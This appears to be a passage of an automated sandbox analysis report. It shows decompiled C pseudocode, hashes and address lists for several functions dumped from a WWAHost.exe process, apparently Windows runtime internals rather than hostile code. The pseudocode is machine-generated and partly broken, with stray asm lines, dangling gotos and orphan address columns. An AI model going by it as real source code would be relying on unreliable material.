                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                              • Instruction Fuzzy Hash: 1B018832702119ABC720FE9EDC41E5BF7ADFB847A4B140524B909CF250DA30DD0187A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 69%
                                              			E03959080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                              				intOrPtr* _t51;
                                              				intOrPtr _t59;
                                              				signed int _t64;
                                              				signed int _t67;
                                              				signed int* _t71;
                                              				signed int _t74;
                                              				signed int _t77;
                                              				signed int _t82;
                                              				intOrPtr* _t84;
                                              				void* _t85;
                                              				intOrPtr* _t87;
                                              				void* _t94;
                                              				signed int _t95;
                                              				intOrPtr* _t97;
                                              				signed int _t99;
                                              				signed int _t102;
                                              				void* _t104;
                                              
                                              				_push(__ebx);
                                              				_push(__esi);
                                              				_push(__edi);
                                              				_t97 = __ecx;
                                              				_t102 =  *(__ecx + 0x14);
                                              				if((_t102 & 0x02ffffff) == 0x2000000) {
                                              					_t102 = _t102 | 0x000007d0;
                                              				}
                                              				_t48 =  *[fs:0x30];
                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                              					_t102 = _t102 & 0xff000000;
                                              				}
                                              				_t80 = 0x3a485ec;
                                              				E03972280(_t48, 0x3a485ec);
                                              				_t51 =  *_t97 + 8;
                                              				if( *_t51 != 0) {
                                              					L6:
                                              					return E0396FFB0(_t80, _t97, _t80);
                                              				} else {
                                              					 *(_t97 + 0x14) = _t102;
                                              					_t84 =  *0x3a4538c; // 0x77576888
                                              					if( *_t84 != 0x3a45388) {
                                              						_t85 = 3;
                                              						asm("int 0x29");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						_push(0x2c);
                                              						_push(0x3a2f6e8);
                                              						E039AD0E8(0x3a485ec, _t97, _t102);
                                              						 *((char*)(_t104 - 0x1d)) = 0;
                                              						_t99 =  *(_t104 + 8);
                                              						__eflags = _t99;
                                              						if(_t99 == 0) {
                                              							L13:
                                              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                              							if(__eflags == 0) {
                                              								E03A288F5(_t80, _t85, 0x3a45388, _t99, _t102, __eflags);
                                              							}
                                              						} else {
                                              							__eflags = _t99 -  *0x3a486c0; // 0xb507b0
                                              							if(__eflags == 0) {
                                              								goto L13;
                                              							} else {
                                              								__eflags = _t99 -  *0x3a486b8; // 0x0
                                              								if(__eflags == 0) {
                                              									goto L13;
                                              								} else {
                                              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                              									__eflags =  *((char*)(_t59 + 0x28));
                                              									if( *((char*)(_t59 + 0x28)) == 0) {
                                              										E03972280(_t99 + 0xe0, _t99 + 0xe0);
                                              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                              										__eflags =  *((char*)(_t99 + 0xe5));
                                              										if(__eflags != 0) {
                                              											E03A288F5(0x3a485ec, _t85, 0x3a45388, _t99, _t102, __eflags);
                                              										} else {
                                              											__eflags =  *((char*)(_t99 + 0xe4));
                                              											if( *((char*)(_t99 + 0xe4)) == 0) {
                                              												 *((char*)(_t99 + 0xe4)) = 1;
                                              												_push(_t99);
                                              												_push( *((intOrPtr*)(_t99 + 0x24)));
                                              												E0399AFD0();
                                              											}
                                              											while(1) {
                                              												_t71 = _t99 + 8;
                                              												 *(_t104 - 0x2c) = _t71;
                                              												_t80 =  *_t71;
                                              												_t95 = _t71[1];
                                              												 *(_t104 - 0x28) = _t80;
                                              												 *(_t104 - 0x24) = _t95;
                                              												while(1) {
                                              													L19:
                                              													__eflags = _t95;
                                              													if(_t95 == 0) {
                                              														break;
                                              													}
                                              													_t102 = _t80;
                                              													 *(_t104 - 0x30) = _t95;
                                              													 *(_t104 - 0x24) = _t95 - 1;
                                              													asm("lock cmpxchg8b [edi]");
                                              													_t80 = _t102;
                                              													 *(_t104 - 0x28) = _t80;
                                              													 *(_t104 - 0x24) = _t95;
                                              													__eflags = _t80 - _t102;
                                              													_t99 =  *(_t104 + 8);
                                              													if(_t80 != _t102) {
                                              														continue;
                                              													} else {
                                              														__eflags = _t95 -  *(_t104 - 0x30);
                                              														if(_t95 !=  *(_t104 - 0x30)) {
                                              															continue;
                                              														} else {
                                              															__eflags = _t95;
                                              															if(_t95 != 0) {
                                              																_t74 = 0;
                                              																 *(_t104 - 0x34) = 0;
                                              																_t102 = 0;
                                              																__eflags = 0;
                                              																while(1) {
                                              																	 *(_t104 - 0x3c) = _t102;
                                              																	__eflags = _t102 - 3;
                                              																	if(_t102 >= 3) {
                                              																		break;
                                              																	}
                                              																	__eflags = _t74;
                                              																	if(_t74 != 0) {
                                              																		L49:
                                              																		_t102 =  *_t74;
                                              																		__eflags = _t102;
                                              																		if(_t102 != 0) {
                                              																			_t102 =  *(_t102 + 4);
                                              																			__eflags = _t102;
                                              																			if(_t102 != 0) {
                                              																				 *0x3a4b1e0(_t74, _t99);
                                              																				 *_t102();
                                              																			}
                                              																		}
                                              																		do {
                                              																			_t71 = _t99 + 8;
                                              																			 *(_t104 - 0x2c) = _t71;
                                              																			_t80 =  *_t71;
                                              																			_t95 = _t71[1];
                                              																			 *(_t104 - 0x28) = _t80;
                                              																			 *(_t104 - 0x24) = _t95;
                                              																			goto L19;
                                              																		} while (_t74 == 0);
                                              																		goto L49;
                                              																	} else {
                                              																		_t82 = 0;
                                              																		__eflags = 0;
                                              																		while(1) {
                                              																			 *(_t104 - 0x38) = _t82;
                                              																			__eflags = _t82 -  *0x3a484c0;
                                              																			if(_t82 >=  *0x3a484c0) {
                                              																				break;
                                              																			}
                                              																			__eflags = _t74;
                                              																			if(_t74 == 0) {
                                              																				_t77 = E03A29063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                              																				__eflags = _t77;
                                              																				if(_t77 == 0) {
                                              																					_t74 = 0;
                                              																					__eflags = 0;
                                              																				} else {
                                              																					_t74 = _t77 + 0xfffffff4;
                                              																				}
                                              																				 *(_t104 - 0x34) = _t74;
                                              																				_t82 = _t82 + 1;
                                              																				continue;
                                              																			}
                                              																			break;
                                              																		}
                                              																		_t102 = _t102 + 1;
                                              																		continue;
                                              																	}
                                              																	goto L20;
                                              																}
                                              																__eflags = _t74;
                                              															}
                                              														}
                                              													}
                                              													break;
                                              												}
                                              												L20:
                                              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                              												 *((char*)(_t99 + 0xe5)) = 1;
                                              												 *((char*)(_t104 - 0x1d)) = 1;
                                              												goto L21;
                                              											}
                                              										}
                                              										L21:
                                              										 *(_t104 - 4) = 0xfffffffe;
                                              										E0395922A(_t99);
                                              										_t64 = E03977D50();
                                              										__eflags = _t64;
                                              										if(_t64 != 0) {
                                              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                              										} else {
                                              											_t67 = 0x7ffe0386;
                                              										}
                                              										__eflags =  *_t67;
                                              										if( *_t67 != 0) {
                                              											_t67 = E03A28B58(_t99);
                                              										}
                                              										__eflags =  *((char*)(_t104 - 0x1d));
                                              										if( *((char*)(_t104 - 0x1d)) != 0) {
                                              											__eflags = _t99 -  *0x3a486c0; // 0xb507b0
                                              											if(__eflags != 0) {
                                              												__eflags = _t99 -  *0x3a486b8; // 0x0
                                              												if(__eflags == 0) {
                                              													_t94 = 0x3a486bc;
                                              													_t87 = 0x3a486b8;
                                              													goto L27;
                                              												} else {
                                              													__eflags = _t67 | 0xffffffff;
                                              													asm("lock xadd [edi], eax");
                                              													if(__eflags == 0) {
                                              														E03959240(_t80, _t99, _t99, _t102, __eflags);
                                              													}
                                              												}
                                              											} else {
                                              												_t94 = 0x3a486c4;
                                              												_t87 = 0x3a486c0;
                                              												L27:
                                              												E03989B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                              											}
                                              										}
                                              									} else {
                                              										goto L13;
                                              									}
                                              								}
                                              							}
                                              						}
                                              						return E039AD130(_t80, _t99, _t102);
                                              					} else {
                                              						 *_t51 = 0x3a45388;
                                              						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                              						 *_t84 = _t51;
                                              						 *0x3a4538c = _t51;
                                              						goto L6;
                                              					}
                                              				}
                                              			}




















                                              0x039b3759
                                              0x039b375c
                                              0x039b375c
                                              0x039b375e
                                              0x039b375e
                                              0x039b3761
                                              0x039b3764
                                              0x00000000
                                              0x00000000
                                              0x039b3766
                                              0x039b3768
                                              0x039b37a3
                                              0x039b37a3
                                              0x039b37a5
                                              0x039b37a7
                                              0x039b37ad
                                              0x039b37b0
                                              0x039b37b2
                                              0x039b37bc
                                              0x039b37c2
                                              0x039b37c2
                                              0x039b37b2
                                              0x03959187
                                              0x03959187
                                              0x0395918a
                                              0x0395918d
                                              0x0395918f
                                              0x03959192
                                              0x03959195
                                              0x00000000
                                              0x03959195
                                              0x00000000
                                              0x039b376a
                                              0x039b376a
                                              0x039b376a
                                              0x039b376c
                                              0x039b376c
                                              0x039b376f
                                              0x039b3775
                                              0x00000000
                                              0x00000000
                                              0x039b3777
                                              0x039b3779
                                              0x039b3782
                                              0x039b3787
                                              0x039b3789
                                              0x039b3790
                                              0x039b3790
                                              0x039b378b
                                              0x039b378b
                                              0x039b378b
                                              0x039b3792
                                              0x039b3795
                                              0x00000000
                                              0x039b3795
                                              0x00000000
                                              0x039b3779
                                              0x039b3798
                                              0x00000000
                                              0x039b3798
                                              0x00000000
                                              0x039b3768
                                              0x039b379b
                                              0x039b379b
                                              0x039b3751
                                              0x039b3749
                                              0x00000000
                                              0x039b3740
                                              0x039591a0
                                              0x039591a3
                                              0x039591a9
                                              0x039591b0
                                              0x00000000
                                              0x039591b0
                                              0x03959187
                                              0x039591b4
                                              0x039591b4
                                              0x039591bb
                                              0x039591c0
                                              0x039591c5
                                              0x039591c7
                                              0x039b37da
                                              0x039591cd
                                              0x039591cd
                                              0x039591cd
                                              0x039591d2
                                              0x039591d5
                                              0x03959239
                                              0x03959239
                                              0x039591d7
                                              0x039591db
                                              0x039591e1
                                              0x039591e7
                                              0x039591fd
                                              0x03959203
                                              0x0395921e
                                              0x03959223
                                              0x00000000
                                              0x03959205
                                              0x03959205
                                              0x03959208
                                              0x0395920c
                                              0x03959214
                                              0x03959214
                                              0x0395920c
                                              0x039591e9
                                              0x039591e9
                                              0x039591ee
                                              0x039591f3
                                              0x039591f3
                                              0x039591f3
                                              0x039591e7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03959134
                                              0x03959125
                                              0x0395911d
                                              0x0395914e
                                              0x039590d1
                                              0x039590d1
                                              0x039590d3
                                              0x039590d6
                                              0x039590d8
                                              0x00000000
                                              0x039590d8
                                              0x039590cf

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 207678e7ee80b73f47161955144a93fc80300a7aa24051487a9e37c0713fb5c6
                                              • Instruction ID: 5c88483bc9e92b83fd0a97f27435218b801e663e1b40f5a960ecd5047de0000e
                                              • Opcode Fuzzy Hash: 207678e7ee80b73f47161955144a93fc80300a7aa24051487a9e37c0713fb5c6
                                              • Instruction Fuzzy Hash: B9018177901604CFD319DF28D840B21BBEDEB86761F294466E905CB691D375EC81CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 46%
                                              			E039EC450(intOrPtr* _a4) {
                                              				signed char _t25;
                                              				intOrPtr* _t26;
                                              				intOrPtr* _t27;
                                              
                                              				_t26 = _a4;
                                              				_t25 =  *(_t26 + 0x10);
                                              				if((_t25 & 0x00000003) != 1) {
                                              					_push(0);
                                              					_push(0);
                                              					_push(0);
                                              					_push( *((intOrPtr*)(_t26 + 8)));
                                              					_push(0);
                                              					_push( *_t26);
                                              					E03999910();
                                              					_t25 =  *(_t26 + 0x10);
                                              				}
                                              				if((_t25 & 0x00000001) != 0) {
                                              					_push(4);
                                              					_t7 = _t26 + 4; // 0x4
                                              					_t27 = _t7;
                                              					_push(_t27);
                                              					_push(5);
                                              					_push(0xfffffffe);
                                              					E039995B0();
                                              					if( *_t27 != 0) {
                                              						_push( *_t27);
                                              						E039995D0();
                                              					}
                                              				}
                                              				_t8 = _t26 + 0x14; // 0x14
                                              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                              				}
                                              				_push( *_t26);
                                              				E039995D0();
                                              				return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                              			}







                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                              • Instruction ID: b53a8fd45a51bd6ea3790975f4ae009c1af666016382ece94a226233bfaf79a7
                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                              • Instruction Fuzzy Hash: DC019276140605BFEB22EF69CC80EA3F77DFF94391F044529F155465A0DB31ACA1CAA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E03A24015(signed int __eax, signed int __ecx) {
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed char _t10;
                                              				signed int _t28;
                                              
                                              				_push(__ecx);
                                              				_t28 = __ecx;
                                              				asm("lock xadd [edi+0x24], eax");
                                              				_t10 = (__eax | 0xffffffff) - 1;
                                              				if(_t10 == 0) {
                                              					_t1 = _t28 + 0x1c; // 0x1e
                                              					E03972280(_t10, _t1);
                                              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                              					E03972280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x3a486ac);
                                              					E0395F900(0x3a486d4, _t28);
                                              					E0396FFB0(0x3a486ac, _t28, 0x3a486ac);
                                              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                              					E0396FFB0(0, _t28, _t1);
                                              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                              						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                              					}
                                              					_t10 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                              				}
                                              				return _t10;
                                              			}








                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffb8bb62f7ec83b3d11e06978beec3fb9885733c11e8f19198c4660bbfc7126c
                                              • Instruction ID: 9d6da37dfffcd1199dbc7ca07be23cadda2ba8f7f14601bf37ed459ea943bb7c
                                              • Opcode Fuzzy Hash: ffb8bb62f7ec83b3d11e06978beec3fb9885733c11e8f19198c4660bbfc7126c
                                              • Instruction Fuzzy Hash: AC0188752016497FC251EB6DCD80E57F7ACFBC5750B000615B50887A51DB78EC51C6E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 61%
                                              			E03A1138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				short _v54;
                                              				char _v60;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed char* _t21;
                                              				intOrPtr _t27;
                                              				intOrPtr _t33;
                                              				intOrPtr _t34;
                                              				signed int _t35;
                                              
                                              				_t32 = __edx;
                                              				_t27 = __ebx;
                                              				_v8 =  *0x3a4d360 ^ _t35;
                                              				_t33 = __edx;
                                              				_t34 = __ecx;
                                              				E0399FA60( &_v60, 0, 0x30);
                                              				_v20 = _a4;
                                              				_v16 = _a8;
                                              				_v28 = _t34;
                                              				_v24 = _t33;
                                              				_v54 = 0x1033;
                                              				if(E03977D50() == 0) {
                                              					_t21 = 0x7ffe0388;
                                              				} else {
                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              				}
                                              				_push( &_v60);
                                              				_push(0x10);
                                              				_push(0x20402);
                                              				_push( *_t21 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                              			}


















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4b771cf117b8272694d98581520c614ddec63feb7ccfa43692455d98fe283f2
                                              • Instruction ID: 010dd93d784f3a2f4ae72d2f325db7e256643972f21d182d25b19aadb3d896a5
                                              • Opcode Fuzzy Hash: e4b771cf117b8272694d98581520c614ddec63feb7ccfa43692455d98fe283f2
                                              • Instruction Fuzzy Hash: B1015275A01318AFDB14EFA9D841EAEB7B8EF84710F00405BB905EB280E6749A11C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 61%
                                              			E03A114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				short _v54;
                                              				char _v60;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed char* _t21;
                                              				intOrPtr _t27;
                                              				intOrPtr _t33;
                                              				intOrPtr _t34;
                                              				signed int _t35;
                                              
                                              				_t32 = __edx;
                                              				_t27 = __ebx;
                                              				_v8 =  *0x3a4d360 ^ _t35;
                                              				_t33 = __edx;
                                              				_t34 = __ecx;
                                              				E0399FA60( &_v60, 0, 0x30);
                                              				_v20 = _a4;
                                              				_v16 = _a8;
                                              				_v28 = _t34;
                                              				_v24 = _t33;
                                              				_v54 = 0x1034;
                                              				if(E03977D50() == 0) {
                                              					_t21 = 0x7ffe0388;
                                              				} else {
                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              				}
                                              				_push( &_v60);
                                              				_push(0x10);
                                              				_push(0x20402);
                                              				_push( *_t21 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                              			}


















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E039558EC(intOrPtr __ecx) {
                                              				signed int _v8;
                                              				char _v28;
                                              				char _v44;
                                              				char _v76;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t10;
                                              				intOrPtr _t16;
                                              				intOrPtr _t17;
                                              				intOrPtr _t27;
                                              				intOrPtr _t28;
                                              				signed int _t29;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t29;
                                              				_t10 =  *[fs:0x30];
                                              				_t27 = __ecx;
                                              				if(_t10 == 0) {
                                              					L6:
                                              					_t28 = 0x3935c80;
                                              				} else {
                                              					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                              					if(_t16 == 0) {
                                              						goto L6;
                                              					} else {
                                              						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                              					}
                                              				}
                                              				if(E03955943() != 0 &&  *0x3a45320 > 5) {
                                              					E039D7B5E( &_v44, _t27);
                                              					_t22 =  &_v28;
                                              					E039D7B5E( &_v28, _t28);
                                              					_t11 = E039D7B9C(0x3a45320, 0x393bf15,  &_v28, _t22, 4,  &_v76);
                                              				}
                                              				return E0399B640(_t11, _t17, _v8 ^ _t29, 0x393bf15, _t27, _t28);
                                              			}
















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0396B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                              				signed char _t11;
                                              				signed char* _t12;
                                              				intOrPtr _t24;
                                              				signed short* _t25;
                                              
                                              				_t25 = __edx;
                                              				_t24 = __ecx;
                                              				_t11 = ( *[fs:0x30])[0x50];
                                              				if(_t11 != 0) {
                                              					if( *_t11 == 0) {
                                              						goto L1;
                                              					}
                                              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                              					L2:
                                              					if( *_t12 != 0) {
                                              						_t12 =  *[fs:0x30];
                                              						if((_t12[0x240] & 0x00000004) == 0) {
                                              							goto L3;
                                              						}
                                              						if(E03977D50() == 0) {
                                              							_t12 = 0x7ffe0385;
                                              						} else {
                                              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                              						}
                                              						if(( *_t12 & 0x00000020) == 0) {
                                              							goto L3;
                                              						}
                                              						return E039D7016(_a4, _t24, 0, 0, _t25, 0);
                                              					}
                                              					L3:
                                              					return _t12;
                                              				}
                                              				L1:
                                              				_t12 = 0x7ffe0384;
                                              				goto L2;
                                              			}








                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03A21074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                              				char _v8;
                                              				void* _v11;
                                              				unsigned int _v12;
                                              				void* _v15;
                                              				void* __esi;
                                              				void* __ebp;
                                              				char* _t16;
                                              				signed int* _t35;
                                              
                                              				_t22 = __ebx;
                                              				_t35 = __ecx;
                                              				_v8 = __edx;
                                              				_t13 =  !( *__ecx) + 1;
                                              				_v12 =  !( *__ecx) + 1;
                                              				if(_a4 != 0) {
                                              					E03A2165E(__ebx, 0x3a48ae4, (__edx -  *0x3a48b04 >> 0x14) + (__edx -  *0x3a48b04 >> 0x14), __edi, __ecx, (__edx -  *0x3a48b04 >> 0x14) + (__edx -  *0x3a48b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                              				}
                                              				E03A1AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                              				if(E03977D50() == 0) {
                                              					_t16 = 0x7ffe0388;
                                              				} else {
                                              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              				}
                                              				if( *_t16 != 0) {
                                              					_t16 = E03A0FE3F(_t22, _t35, _v8, _v12);
                                              				}
                                              				return _t16;
                                              			}












                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 59%
                                              			E03A0FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				signed int _v12;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				short _v58;
                                              				char _v64;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed char* _t18;
                                              				intOrPtr _t24;
                                              				intOrPtr _t30;
                                              				intOrPtr _t31;
                                              				signed int _t32;
                                              
                                              				_t29 = __edx;
                                              				_t24 = __ebx;
                                              				_v12 =  *0x3a4d360 ^ _t32;
                                              				_t30 = __edx;
                                              				_t31 = __ecx;
                                              				E0399FA60( &_v64, 0, 0x30);
                                              				_v24 = _a4;
                                              				_v32 = _t31;
                                              				_v28 = _t30;
                                              				_v58 = 0x266;
                                              				if(E03977D50() == 0) {
                                              					_t18 = 0x7ffe0388;
                                              				} else {
                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              				}
                                              				_push( &_v64);
                                              				_push(0x10);
                                              				_push(0x20402);
                                              				_push( *_t18 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                              			}

















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 59%
                                              			E03A0FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				signed int _v12;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				short _v58;
                                              				char _v64;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed char* _t18;
                                              				intOrPtr _t24;
                                              				intOrPtr _t30;
                                              				intOrPtr _t31;
                                              				signed int _t32;
                                              
                                              				_t29 = __edx;
                                              				_t24 = __ebx;
                                              				_v12 =  *0x3a4d360 ^ _t32;
                                              				_t30 = __edx;
                                              				_t31 = __ecx;
                                              				E0399FA60( &_v64, 0, 0x30);
                                              				_v24 = _a4;
                                              				_v32 = _t31;
                                              				_v28 = _t30;
                                              				_v58 = 0x267;
                                              				if(E03977D50() == 0) {
                                              					_t18 = 0x7ffe0388;
                                              				} else {
                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              				}
                                              				_push( &_v64);
                                              				_push(0x10);
                                              				_push(0x20402);
                                              				_push( *_t18 & 0x000000ff);
                                              				return E0399B640(E03999AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                              			}

















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
